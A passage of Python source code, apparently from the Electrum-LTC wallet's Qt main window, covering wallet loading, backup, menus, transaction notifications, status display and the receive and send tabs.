elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-LTC Testnet" if constants.net.TESTNET else "Electrum-LTC"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend litecoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request litecoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Litecoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
try:
new_path = self.wallet.save_backup()
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
if new_path:
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
else:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Lightning Network"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum-ltc.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('litecoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-LTC",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Litecoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Litecoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-LTC - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-LTC", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-LTC", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter="",
*, default_extension: str = None,
default_filter: str = None) -> Optional[str]:
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, filename)
file_dialog = QFileDialog(self, title, path, filter)
file_dialog.setAcceptMode(QFileDialog.AcceptSave)
if default_extension:
# note: on MacOS, the selected filter's first extension seems to have priority over this...
file_dialog.setDefaultSuffix(default_extension)
if default_filter:
assert default_filter in filter, f"default_filter={default_filter!r} does not appear in filter={filter!r}"
file_dialog.selectNameFilter(default_filter)
if file_dialog.exec() != QDialog.Accepted:
return None
selected_path = file_dialog.selectedFiles()[0]
if selected_path and directory != os.path.dirname(selected_path):
self.config.set_key('io_dir', os.path.dirname(selected_path), True)
return selected_path
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
# x is in sats
return self.config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
# amount is in sats
text = self.config.format_amount_and_units(amount)
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Litecoin addresses.'),
_('The Litecoin address never expires and will always be part of this Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('New Address'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Litecoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Litecoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
